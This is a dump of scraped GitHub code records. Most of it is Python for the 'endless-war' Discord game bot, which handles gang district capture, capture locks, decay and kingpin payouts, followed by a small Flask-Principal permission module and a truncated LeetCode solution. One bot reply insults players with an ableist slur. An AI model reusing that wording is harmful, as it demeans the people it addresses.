ewcfg.id_to_poi[self.name].str_name\n\t\t\t\t)\n\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel] + ewcfg.hideout_channels\n\t\t\t\tfor ch in channels:\n\t\t\t\t\tresp_cont_decay.add_channel_response(channel = ch, response = message)\n\t\t\tresponses = self.change_ownership(\"\", ewcfg.actor_decay)\n\t\t\tresp_cont_decay.add_response_container(responses)\n\t\t\tself.capturing_faction = \"\"\n\n\t\treturn resp_cont_decay\n\n\tdef change_capture_lock(self, progress):\n\t\tresp_cont = ewutils.EwResponseContainer(id_server = self.id_server)\n\n\t\tprogress_before = self.time_unlock\n\n\t\tself.time_unlock += progress\n\n\t\tif self.time_unlock < 0:\n\t\t\tself.time_unlock == 0\n\n\t\tprogress_after = self.time_unlock\n\n\t\tif (progress_after // ewcfg.capture_lock_milestone) != (progress_before // ewcfg.capture_lock_milestone):\n\t\t\ttime_mins = ewutils.formatNiceTime(seconds = progress_after, round_to_minutes = True)\n\t\t\tif progress < 0:\n\t\t\t\tif progress_before >= 15 * 60 >= progress_after:\n\t\t\t\t\tmessage = \"{district} will unlock for capture in {time}.\".format(\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\ttime = time_mins\n\t\t\t\t\t)\n\t\t\t\t\tchannels = ewcfg.hideout_channels\n\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont.add_channel_response(channel = ch, response = message)\n\t\t\t\t\n\t\t\t\telif progress_before >= 5 * 60 >= progress_after:\n\t\t\t\t\tmessage = \"{district} will unlock for capture in {time}.\".format(\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\ttime = time_mins\n\t\t\t\t\t)\n\t\t\t\t\tchannels = ewcfg.hideout_channels\n\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont.add_channel_response(channel = ch, response = message)\n\t\t\t\t\n\t\t\t\tmessage = \"{district} will unlock for capture in {time}.\".format(\n\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\ttime = time_mins\n\t\t\t\t)\n\n\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\n\t\t\t\tfor ch in channels:\n\t\t\t\t\tresp_cont.add_channel_response(channel = ch, response = message)\n\n\t\tif self.time_unlock == 0 and progress < 0:\n\t\t\tchip_cont = self.change_capture_points(progress = -1, actor = ewcfg.actor_decay)\n\t\t\tresp_cont.add_response_container(chip_cont)\n\n\t\treturn resp_cont\n\n\tdef change_capture_points(self, progress, actor, num_lock = 0): # actor can either be a faction or \"decay\"\n\t\tprogress_percent_before = int(self.capture_points / 
self.max_capture_points * 100)\n\n\t\tself.capture_points += progress\n\n\t\tresp_cont_change_cp = ewutils.EwResponseContainer(client = ewutils.get_client(), id_server = self.id_server)\n\n\t\t# ensures that the value doesn't exceed the bounds\n\t\tif self.capture_points < 0:\n\t\t\tself.capture_points = 0\n\t\telif self.capture_points > self.max_capture_points:\n\t\t\tself.capture_points = self.max_capture_points\n\n\t\tprogress_percent_after = int(self.capture_points / self.max_capture_points * 100)\n\n\t\tif num_lock > 0 \\\n\t\tand self.capture_points == self.max_capture_points \\\n\t\tand progress > 0 \\\n\t\tand self.property_class in ewcfg.capture_locks \\\n\t\tand self.time_unlock == 0:\n\t\t\tbase_time_unlock = ewcfg.capture_locks.get(self.property_class)\n\t\t\tresponses = self.change_capture_lock(base_time_unlock + (num_lock - 1) * ewcfg.capture_lock_per_gangster)\n\t\t\tresp_cont_change_cp.add_response_container(responses)\n\n\t\tif progress > 0 and actor != ewcfg.actor_decay:\n\t\t\tself.capturing_faction = actor\n\n\t\t# display a message if it's reached a certain amount\n\t\tif (progress_percent_after // ewcfg.capture_milestone) != (progress_percent_before // ewcfg.capture_milestone): # if a progress milestone was reached\n\t\t\tif progress > 0: # if it was a positive change\n\t\t\t\tif ewcfg.capture_milestone <= progress_percent_after < ewcfg.capture_milestone * 2: # if its the first milestone\n\t\t\t\t\tmessage = \"{faction} have started capturing {district}. Current progress: {progress}%\".format(\n\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t)\n\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\t\t\t\telse:\n\t\t\t\t\t# alert both factions of significant capture progress\n\t\t\t\t\tif progress_percent_after >= 30 > progress_percent_before: # if the milestone of 30% was just reached\n\t\t\t\t\t\tmessage = \"{faction} are capturing {district}.\".format(\n\t\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t\t)\n\t\t\t\t\t\tif self.controlling_faction == ewcfg.faction_rowdys:\n\t\t\t\t\t\t\tchannels = [ewcfg.channel_rowdyroughhouse]\n\t\t\t\t\t\telif self.controlling_faction == ewcfg.faction_killers:\n\t\t\t\t\t\t\tchannels = [ewcfg.channel_copkilltown]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tchannels = ewcfg.hideout_channels\n\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\n\t\t\t\t\tif self.controlling_faction != actor: # if it's not already owned by that faction\n\t\t\t\t\t\tmessage = \"{faction} continue to capture {district}. Current progress: {progress}%\".format(\n\t\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t\t)\n\t\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmessage = \"{faction} are renewing their grasp on {district}. 
Current control level: {progress}%\".format(\n\t\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t\t)\n\t\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\t\t\telse: # if it was a negative change\n\t\t\t\tif self.controlling_faction != \"\": # if the district is owned by a faction\n\t\t\t\t\tif progress_percent_after < 20 <= progress_percent_before:\n\t\t\t\t\t\tmessage = \"{faction}' control of {district} is slipping.\".format(\n\t\t\t\t\t\t\tfaction = self.controlling_faction.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t\t)\n\t\t\t\t\t\tchannels = ewcfg.hideout_channels\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\n\t\t\t\t\telif progress_percent_after < 50 <= progress_percent_before and actor != ewcfg.actor_decay:\n\t\t\t\t\t\tmessage = \"{faction} are de-capturing {district}.\".format(\n\t\t\t\t\t\t\tfaction = actor.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t\t)\n\t\t\t\t\t\tchannels = ewcfg.hideout_channels\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\n\t\t\t\t\tmessage = \"{faction}' control of {district} has decreased. Remaining control level: {progress}%\".format(\n\t\t\t\t\t\tfaction = self.controlling_faction.capitalize(),\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t)\n\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\t\t\t\t\t\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\t\t\t\telse: # if it's an uncontrolled district\n\t\t\t\t\tmessage = \"{faction}' capture progress of {district} has decreased. Remaining progress: {progress}%\".format(\n\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t)\n\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\t\t\t\t\t\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\n\t\tif progress < 0 and self.capture_points == 0:\n\t\t\tself.capturing_faction = \"\"\n\n\t\t# if capture_points is at its maximum value (or above), assign the district to the capturing faction\n\t\tif self.capture_points == self.max_capture_points:\n\t\t\tresponses = self.change_ownership(self.capturing_faction, actor)\n\t\t\tresp_cont_change_cp.add_response_container(responses)\n\n\t\t# if the district has decayed or been de-captured and it wasn't neutral anyway, make it neutral\n\t\telif self.capture_points == 0 and self.controlling_faction != \"\":\n\t\t\tresponses = self.change_ownership(\"\", actor)\n\t\t\tresp_cont_change_cp.add_response_container(responses)\n\n\t\treturn resp_cont_change_cp\n\n\t\"\"\"\n\t\tChange who controls the district. 
Can be used to update the channel topic by passing the already controlling faction as an arg.\n\t\"\"\"\n\tdef change_ownership(self, new_owner, actor, client = None): # actor can either be a faction, \"decay\", or \"init\"\n\t\tresp_cont_owner = ewutils.EwResponseContainer(client = ewutils.get_client(), id_server = self.id_server)\n\n\t\tfactions = [\"\", ewcfg.faction_killers, ewcfg.faction_rowdys]\n\n\t\tif new_owner in factions:\n\t\t\tserver = ewcfg.server_list[self.id_server]\n\t\t\tchannel_str = ewcfg.id_to_poi[self.name].channel\n\t\t\tchannel = ewutils.get_channel(server = server, channel_name = channel_str)\n\n\t\t\tif channel is not None and channel.topic: # tests if the topic is neither None nor empty\n\t\t\t\tinitialized = False\n\n\t\t\t\t# initialize channel topic control statuses\n\t\t\t\tfor faction in factions:\n\t\t\t\t\tif ewcfg.control_topics[faction] in channel.topic:\n\t\t\t\t\t\tinitialized = True\n\n\t\t\t\tif not initialized:\n\t\t\t\t\tnew_topic = channel.topic + \" \" + ewcfg.control_topics[new_owner]\n\n\t\t\t\t# replace the the string of the previously controlling faction with that of the new one.\n\t\t\t\telse:\n\t\t\t\t\tnew_topic = channel.topic.replace(ewcfg.control_topics[self.controlling_faction], ewcfg.control_topics[new_owner])\n\n\t\t\t\tif client is None:\n\t\t\t\t\tclient = ewutils.get_client()\n\n\n\t\t\t\tif client is not None:\n\t\t\t\t\tresp_cont_owner.add_channel_topic(channel = channel_str, topic = new_topic)\n\n\t\t\tif self.controlling_faction != new_owner: # if the controlling faction actually changed\n\t\t\t\tif new_owner != \"\": # if it was captured by a faction instead of being de-captured or decayed\n\t\t\t\t\tcountdown_message = \"\"\n\t\t\t\t\tif self.time_unlock > 0:\n\t\t\t\t\t\tcountdown_message = \"It will unlock for capture again in {}.\".format(ewutils.formatNiceTime(seconds = self.time_unlock, round_to_minutes = True))\n\t\t\t\t\tmessage = \"{faction} just captured {district}. 
{countdown}\".format(\n\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\tcountdown = countdown_message\n\t\t\t\t\t)\n\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel] + ewcfg.hideout_channels\n\t\t\t\t\t\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont_owner.add_channel_response(channel = ch, response = message)\n\t\t\t\telse: # successful de-capture or full decay\n\t\t\t\t\tif actor != ewcfg.actor_decay:\n\t\t\t\t\t\tmessage = \"{faction} just wrested control over {district} from the {other_faction}.\".format(\n\t\t\t\t\t\t\tfaction = actor.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tother_faction = self.controlling_faction # the faction that just lost control\n\t\t\t\t\t\t)\n\t\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel] + ewcfg.hideout_channels\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_owner.add_channel_response(channel = ch, response = message)\n\n\t\t\t\tself.controlling_faction = new_owner\n\n\t\treturn resp_cont_owner\n\n\t\"\"\" add or remove slime \"\"\"\n\tdef change_slimes(self, n = 0, source = None):\n\t\tchange = int(n)\n\t\tself.slimes += change\n\n\"\"\"\n\tInforms the player about their current zone's capture progress\n\"\"\"\nasync def capture_progress(cmd):\n\tuser_data = EwUser(member = cmd.message.author)\n\tresponse = \"\"\n\n\tpoi = ewcfg.id_to_poi.get(user_data.poi)\n\tresponse += \"**{}**: \".format(poi.str_name)\n\n\tif not user_data.poi in ewcfg.capturable_districts:\n\t\tresponse += \"This zone cannot be captured.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tdistrict_data = EwDistrict(id_server = user_data.id_server, district = user_data.poi)\n\n\n\tif district_data.controlling_faction != \"\":\n\t\tresponse += \"{} control this district. \".format(district_data.controlling_faction.capitalize())\n\telif district_data.capturing_faction != \"\":\n\t\tresponse += \"{} are capturing this district. \".format(district_data.capturing_faction.capitalize())\n\telse:\n\t\tresponse += \"Nobody has staked a claim to this district yet. \".format(district_data.controlling_faction.capitalize())\n\n\tresponse += \"Current capture progress: {:.3g}%\".format(100 * district_data.capture_points / district_data.max_capture_points)\n\n\tif district_data.time_unlock > 0:\n\n\n\t\tresponse += \"\\nThis district cannot be captured currently. It will unlock in {}.\".format(ewutils.formatNiceTime(seconds = district_data.time_unlock, round_to_minutes = True))\n\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\t\n\nasync def annex(cmd):\n\tuser_data = EwUser(member = cmd.message.author)\n\tresponse = \"\"\n\tresp_cont = ewutils.EwResponseContainer(id_server = cmd.message.server.id)\n\ttime_now = int(time.time())\n\n\tpoi = ewcfg.id_to_poi.get(user_data.poi)\n\n\tif user_data.life_state == ewcfg.life_state_corpse:\n\t\tresponse = \"You ineffectively try shaking your can of spraypaint to whip up some sick graffiti. Alas, you’re all outta slime. 
\" \\\n \"They should really make these things compatible with ectoplasm.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif not (len(user_data.faction) > 0 and user_data.life_state == ewcfg.life_state_enlisted):\n\t\tresponse = \"Juveniles are too chickenshit to make graffiti and risk getting busted by the cops. Fuckin’ losers.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif user_data.poi in [ewcfg.poi_id_rowdyroughhouse, ewcfg.poi_id_copkilltown]:\n\t\tresponse = \"There’s no point, the rest of your gang has already covered this place in spraypaint. Focus on exporting your graffiti instead.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif user_data.poi == ewcfg.poi_id_juviesrow:\n\t\tresponse = \"Nah, the Rowdys and Killers have both agreed this is neutral ground. You don’t want to start a diplomatic crisis, \" \\\n \"just stick to spraying down sick graffiti and splattering your rival gang across the pavement in the other districts.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif not user_data.poi in ewcfg.capturable_districts:\n\t\tresponse = \"This zone cannot be captured.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tdistrict_data = EwDistrict(id_server = user_data.id_server, district = user_data.poi)\n\n\tif district_data.time_unlock > 0:\n\t\tresponse = \"You can’t spray graffiti here yet, it’s too soon after your rival gang extended their own cultural dominance over it. Try again in {}.\".format(ewutils.formatNiceTime(seconds = district_data.time_unlock, round_to_minutes = True))\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif district_data.all_neighbors_friendly():\n\t\tresponse = \"What the hell are you doing, dude? You can’t put down any graffiti here, it’s been completely overrun by your rival gang. \" \\\n \"You can only spray districts that have at least one unfriendly neighbor, duh!\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\t\n\tusers_in_district = district_data.get_players_in_district(\n\t\tlife_states = [ewcfg.life_state_enlisted],\n\t\tignore_offline = True,\n\t\tpvp_only = True\n\t)\n\n\tallies_in_district = district_data.get_players_in_district(\n\t\tfactions = [user_data.faction],\n\t\tlife_states = [ewcfg.life_state_enlisted],\n\t\tignore_offline = True,\n\t\tpvp_only = True\n\t)\n\n\tif len(users_in_district) > len(allies_in_district):\n\t\tresponse = \"Holy shit, deal with your rival gangsters first! 
You can’t spray graffiti while they’re on the prowl!\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tmutations = user_data.get_mutations()\n\n\tslimes_spent = ewutils.getIntToken(tokens = cmd.tokens, allow_all = True)\n\tcapture_discount = 1\n\n\tif ewcfg.mutation_id_lonewolf in mutations:\n\t\tif user_data.time_expirpvp > time_now:\n\t\t\tif len(users_in_district) == 1:\n\t\t\t\tcapture_discount *= 0.8\n\t\telse:\n\t\t\tif len(users_in_district) == 0:\n\t\t\t\tcapture_discount *= 0.8\n\n\tif ewcfg.mutation_id_patriot in mutations:\n\t\tcapture_discount *= 0.8\n\n\tif slimes_spent == None:\n\t\tresponse = \"How much slime do you want to spend on spraying graffiti in this district?\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif slimes_spent < 0:\n\t\tslimes_spent = user_data.slimes\n\n\tif slimes_spent > user_data.slimes:\n\t\tresponse = \"You don't have that much slime, retard.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tnum_lock = len(allies_in_district)\n\tif user_data.time_expirpvp < time_now:\n\t\tnum_lock += 1\n\n\tif (district_data.controlling_faction not in [\"\", user_data.faction]) or (district_data.capturing_faction not in [\"\", user_data.faction]):\n\t\tslimes_decap = min(district_data.capture_points, int(slimes_spent / capture_discount))\n\t\tdecap_resp = district_data.change_capture_points(\n\t\t\tprogress = -slimes_decap,\n\t\t\tactor = user_data.faction,\n\t\t\tnum_lock = num_lock\n\t\t)\n\t\tresp_cont.add_response_container(decap_resp)\n\t\t\n\t\tuser_data.change_slimes(n = -slimes_decap * capture_discount, source = ewcfg.source_spending)\n\t\tslimes_spent -= slimes_decap * capture_discount\n\n\tslimes_cap = min(district_data.max_capture_points - district_data.capture_points, int(slimes_spent / capture_discount))\n\tcap_resp = district_data.change_capture_points(\n\t\tprogress = slimes_cap,\n\t\tactor = user_data.faction,\n\t\tnum_lock = num_lock\n\t)\n\tresp_cont.add_response_container(cap_resp)\n\t\t\n\tuser_data.change_slimes(n = -slimes_cap * capture_discount, source = ewcfg.source_spending)\n\n\t# Flag the user for PvP\n\tuser_data.time_expirpvp = ewutils.calculatePvpTimer(user_data.time_expirpvp, (int(time.time()) + ewcfg.time_pvp_annex))\n\n\tuser_data.persist()\n\tdistrict_data.persist()\n\tawait ewrolemgr.updateRoles(client = cmd.client, member = cmd.message.author)\n\n\treturn await resp_cont.post()\n\n\"\"\"\n\tUpdates/Increments the capture_points values of all districts every time it's called\n\"\"\"\nasync def capture_tick(id_server):\n\t# the variables might apparently be accessed before assignment if i didn't declare them here\n\tcursor = None\n\tconn_info = None\n\n\tresp_cont_capture_tick = ewutils.EwResponseContainer(client = ewutils.get_client(), id_server = id_server)\n\n\tall_districts = ewcfg.capturable_districts\n\n\n\tif len(all_districts) > 0: # if all_districts isn't empty\n\t\tserver = ewcfg.server_list[id_server]\n\t\ttime_old = time.time()\n\n\t\tfor district in all_districts:\n\t\t\tdistrict_name = district\n\t\t\tdist = EwDistrict(id_server = id_server, district = district_name)\n\n\t\t\tif dist.time_unlock > 0 and not dist.all_neighbors_friendly():\n\t\t\t\tresponses = dist.change_capture_lock(progress = 
-ewcfg.capture_tick_length)\n\t\t\t\tresp_cont_capture_tick.add_response_container(responses)\n\t\t\t\tdist.persist()\n\n\t\t\tif dist.time_unlock > 0:\n\t\t\t\tcontinue\n\n\t\t\t# no more automatic capping\n\t\t\tcontinue\n\n\t\t\tcontrolling_faction = dist.controlling_faction\n\n\t\t\tgangsters_in_district = dist.get_players_in_district(min_slimes = ewcfg.min_slime_to_cap, life_states = [ewcfg.life_state_enlisted], ignore_offline = True)\n\t\t\t\t\t\n\n\t\t\tslimeoids = ewutils.get_slimeoids_in_poi(poi = district_name, id_server = id_server, sltype = ewcfg.sltype_nega)\n\t\t\t\n\t\t\tnega_present = len(slimeoids) > 0\n#\t\t\tif nega_present:\n#\t\t\t\tcontinue\n\n\t\t\t# the faction that's actively capturing the district this tick\n\t\t\t# if no players are present, it's None, if only players of one faction (ignoring juvies and ghosts) are,\n\t\t\t# it's the faction's name, i.e. 'rowdys' or 'killers', and if both are present, it's 'both'\n\t\t\tfaction_capture = None\n\n\t\t\t# how much progress will be made. is higher the more people of one faction are in a district, and is 0 if both teams are present\n\t\t\tcapture_speed = 0\n\n\t\t\t# number of players actively capturing\n\t\t\tnum_capturers = 0\n\n\t\t\tdc_stat_increase_list = []\n\n\t\t\t# checks if any players are in the district and if there are only players of the same faction, i.e. progress can happen\n\t\t\tfor player in gangsters_in_district:\n\t\t\t\tplayer_id = player\n\t\t\t\tuser_data = EwUser(id_user = player_id, id_server = id_server)\n\t\t\t\tplayer_faction = user_data.faction\n\n\t\t\t\tmutations = user_data.get_mutations()\n\n\t\t\t\ttry:\n\t\t\t\t\tplayer_online = server.get_member(player_id).status != discord.Status.offline\n\t\t\t\texcept:\n\t\t\t\t\tplayer_online = False\n\n\t\t\t\t#ewutils.logMsg(\"Online status checked. 
Time elapsed: %f\" % (time.time() - time_old) + \" Server: %s\" % id_server + \" Player: %s\" % player_id + \" Status: %s\" % (\"online\" if player_online else \"offline\"))\n\n\t\t\t\tif player_online:\n\t\t\t\t\tif faction_capture not in [None, player_faction]: # if someone of the opposite faction is in the district\n\t\t\t\t\t\tfaction_capture = 'both' # standstill, gang violence has to happen\n\t\t\t\t\t\tcapture_speed = 0\n\t\t\t\t\t\tnum_capturers = 0\n\t\t\t\t\t\tdc_stat_increase_list.clear()\n\n\t\t\t\t\telse: # if the district isn't already controlled by the player's faction and the capture isn't halted by an enemy\n\t\t\t\t\t\tfaction_capture = player_faction\n\t\t\t\t\t\tplayer_capture_speed = 1\n\t\t\t\t\t\tif ewcfg.mutation_id_lonewolf in mutations and len(gangsters_in_district) == 1:\n\t\t\t\t\t\t\tplayer_capture_speed *= 2\n\t\t\t\t\t\tif ewcfg.mutation_id_patriot in mutations:\n\t\t\t\t\t\t\tplayer_capture_speed *= 2\n\t\t\t\t\t\t\t\n\n\t\t\t\t\t\tcapture_speed += player_capture_speed\n\t\t\t\t\t\tnum_capturers += 1\n\t\t\t\t\t\tdc_stat_increase_list.append(player_id)\n\n\n\t\t\tif faction_capture not in ['both', None]: # if only members of one faction is present\n\t\t\t\tif district_name in ewcfg.capturable_districts:\n\t\t\t\t\tfriendly_neighbors = dist.get_number_of_friendly_neighbors()\n\t\t\t\t\tif dist.all_neighbors_friendly():\n\t\t\t\t\t\tcapture_speed = 0\n\t\t\t\t\telif dist.controlling_faction == faction_capture:\n\t\t\t\t\t\tcapture_speed *= 1 + 0.1 * friendly_neighbors\n\t\t\t\t\telse:\n\t\t\t\t\t\tcapture_speed /= 1 + 0.1 * friendly_neighbors\n\n\t\t\t\t\tcapture_progress = dist.capture_points\n\n\t\t\t\t\tif faction_capture != dist.capturing_faction:\n\t\t\t\t\t\tcapture_progress *= -1\n\n\t\t\t\t\tcapture_speed *= ewcfg.baseline_capture_speed\n\n\n\t\t\t\t\tif dist.capture_points < dist.max_capture_points:\n\t\t\t\t\t\tfor stat_recipient in dc_stat_increase_list:\n\t\t\t\t\t\t\tewstats.change_stat(\n\t\t\t\t\t\t\t\tid_server = id_server,\n\t\t\t\t\t\t\t\tid_user = stat_recipient,\n\t\t\t\t\t\t\t\tmetric = ewcfg.stat_capture_points_contributed,\n\t\t\t\t\t\t\t\tn = ewcfg.capture_tick_length * capture_speed\n\t\t\t\t\t\t\t)\n\n\t\t\t\t\tif faction_capture == dist.capturing_faction: # if the faction is already in the process of capturing, continue\n\t\t\t\t\t\tresponses = dist.change_capture_points(ewcfg.capture_tick_length * capture_speed, faction_capture, num_capturers)\n\t\t\t\t\t\tresp_cont_capture_tick.add_response_container(responses)\n\n\t\t\t\t\telif dist.capture_points == 0 and dist.controlling_faction == \"\": # if it's neutral, start the capture\n\t\t\t\t\t\tresponses = dist.change_capture_points(ewcfg.capture_tick_length * capture_speed, faction_capture, num_capturers)\n\t\t\t\t\t\tresp_cont_capture_tick.add_response_container(responses)\n\n\t\t\t\t\t\tdist.capturing_faction = faction_capture\n\n\t\t\t\t\t# lower the enemy faction's progress to revert it to neutral (or potentially get it onto your side without becoming neutral first)\n\t\t\t\t\telse: # if the (de-)capturing faction is not in control\n\t\t\t\t\t\tresponses = dist.change_capture_points(-(ewcfg.capture_tick_length * capture_speed * ewcfg.decapture_speed_multiplier), faction_capture)\n\t\t\t\t\t\tresp_cont_capture_tick.add_response_container(responses)\n\n\t\t\t\t\tdist.persist()\n\n\tawait resp_cont_capture_tick.post()\n\n\"\"\"\n\tCoroutine that continually calls capture_tick; is called once per server, and not just once globally\n\"\"\"\nasync def 
capture_tick_loop(id_server):\n\tinterval = ewcfg.capture_tick_length\n\t# causes a capture tick to happen exactly every 10 seconds (the \"elapsed\" thing might be unnecessary, depending on how long capture_tick ends up taking on average)\n\twhile not ewutils.TERMINATE:\n\t\tawait capture_tick(id_server = id_server)\n\t\t# ewutils.logMsg(\"Capture tick happened on server %s.\" % id_server + \" Timestamp: %d\" % int(time.time()))\n\n\t\tawait asyncio.sleep(interval)\n\n\"\"\"\n\tGives both kingpins the appropriate amount of slime for how many districts they own and lowers the capture_points property of each district by a certain amount, turning them neutral after a while\n\"\"\"\nasync def give_kingpins_slime_and_decay_capture_points(id_server):\n\tresp_cont_decay_loop = ewutils.EwResponseContainer(client = ewutils.get_client(), id_server = id_server)\n\n\tfor kingpin_role in [ewcfg.role_rowdyfucker, ewcfg.role_copkiller]:\n\t\tkingpin = ewutils.find_kingpin(id_server = id_server, kingpin_role = kingpin_role)\n\n\t\tif kingpin is not None:\n\t\t\ttotal_slimegain = 0\n\t\t\tfor id_district in ewcfg.capturable_districts:\n\n\t\t\t\tdistrict = EwDistrict(id_server = id_server, district = id_district)\n\n\t\t\t\t# if the kingpin is controlling this district give the kingpin slime based on the district's property class\n\t\t\t\tif district.controlling_faction == (ewcfg.faction_killers if kingpin.faction == ewcfg.faction_killers else ewcfg.faction_rowdys):\n\t\t\t\t\tslimegain = ewcfg.district_control_slime_yields[district.property_class]\n\t\t\t\t\t# increase slimeyields by 10 percent per friendly neighbor\n\t\t\t\t\tfriendly_mod = 1 + 0.1 * district.get_number_of_friendly_neighbors()\n\t\t\t\t\ttotal_slimegain += slimegain * friendly_mod\n\n\t\t\tkingpin.change_slimes(n = total_slimegain)\n\t\t\tkingpin.persist()\n\n\t\t\tewutils.logMsg(kingpin_role + \" just received %d\" % total_slimegain + \" slime for their captured districts.\")\n\n\t# Decay capture points.\n\tfor id_district in ewcfg.capturable_districts:\n\t\tdistrict = EwDistrict(id_server = id_server, district = id_district)\n\n\t\tresponses = district.decay_capture_points()\n\t\tresp_cont_decay_loop.add_response_container(responses)\n\t\tdistrict.persist()\n\tawait resp_cont_decay_loop.post()\n","repo_name":"Peregri/endless-war","sub_path":"ewdistrict.py","file_name":"ewdistrict.py","file_ext":"py","file_size_in_byte":34856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"40244562950","text":"from flask_principal import Permission, ItemNeed, RoleNeed\nfrom util.database import engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\n\nclass UserPermission(Permission):\n def __init__(self, action, idr):\n needPermiso = ItemNeed(action, idr, 'manage')\n super(UserPermission, self).__init__(needPermiso)\n \nclass UserRol(Permission):\n def __init__(self, rol):\n need = RoleNeed(rol)\n super(UserRol, self).__init__(need)","repo_name":"elevazquez/sap","sub_path":"src/UserPermission.py","file_name":"UserPermission.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10841520553","text":"class Solution(object):\n def judgeCircle(self, moves):\n \"\"\"\n :type moves: str\n :rtype: bool\n \"\"\"\n count = dict.fromkeys(list('UDLR'), 0)\n for c in moves:\n count[c] += 1\n if count['U'] == 
